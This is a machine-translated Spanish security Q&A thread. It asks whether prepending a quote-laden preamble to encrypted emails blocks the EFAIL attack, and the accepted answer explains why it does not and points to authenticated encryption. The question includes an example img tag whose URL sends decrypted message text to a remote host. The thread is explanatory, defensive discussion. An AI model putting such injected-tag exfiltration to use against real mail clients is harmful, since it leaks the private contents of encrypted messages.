¿Es esta una protección simple contra EFAIL?

Question

¿Es esta una protección simple contra EFAIL?

#1 de Mike Ounsworth (4 votos)

5

Según entiendo EFAIL , el ataque funciona porque los clientes de correo electrónico pueden ser forzados a concatenar el mensaje descifrado en un texto proporcionado por el atacante. en una URL.

Pero, ¿no sería una contramedida usar un preámbulo adecuado con cada mensaje secreto enviado, como

nice try " '
Secret meeting 
Tomorrow 9pm

? De la manera en que entiendo el (los) ataque (s), esto resultaría en algo como

<img src="http://efail.de/nice%20try%"'SecretmeetingTomorrow9pm">

es decir, una etiqueta img que probablemente ni siquiera sea válida y que filtre solo el "buen intento" inicial del atacante.

email efail

pregunta Hagen von Eitzen 18.05.2018 - 14:38

fuente

1 respuesta

Lea otras preguntas en las etiquetas email efail

WireGuard: ¿qué hay de malo con esta asignación automática de IP? Cómo detecta Google los ataques patrocinados por el estado

score 4 · Accepted Answer

Eso puede funcionar en algunos ataques ingenuos de EFAIL, pero

la última página de el documento técnico de EFAIL enumera una serie de variantes conocidas de EFAIL; la mayoría, pero no todos, se basan en etiquetas HTML maliciosas y caracteres de comillas. (Tenga en cuenta, en particular, el último que lo hace a través de los encabezados de correo electrónico).
Mi entendimiento es que debido a cómo funciona AES_CBC, el atacante puede elegir dónde en el correo electrónico para insertar la etiqueta maliciosa <img> , así que una vez que descubran su truco, lo insertarán después del nice try " ' .

Hablando en términos generales, los ataques como este se evitan mejor si se aborda la causa raíz en lugar de aplicar correcciones de curita en un juego sin fin, un whack-a-mole.

En el caso de EFAIL, la causa principal son los clientes de correo electrónico que representan contenido HTML y siguen enlaces externos, incluso en contenido no confiable. La solución adecuada es que los proveedores de clientes de correo electrónico tengan más cuidado con el uso del cifrado autenticado (AES_GCM) y las firmas digitales.

El comportamiento actual de la mayoría de los clientes de correo electrónico cuando falla la validación de una firma es representar el correo electrónico, pero colocar una pancarta de advertencia en la parte superior. Me pregunto si veremos ese cambio como resultado de EFAIL?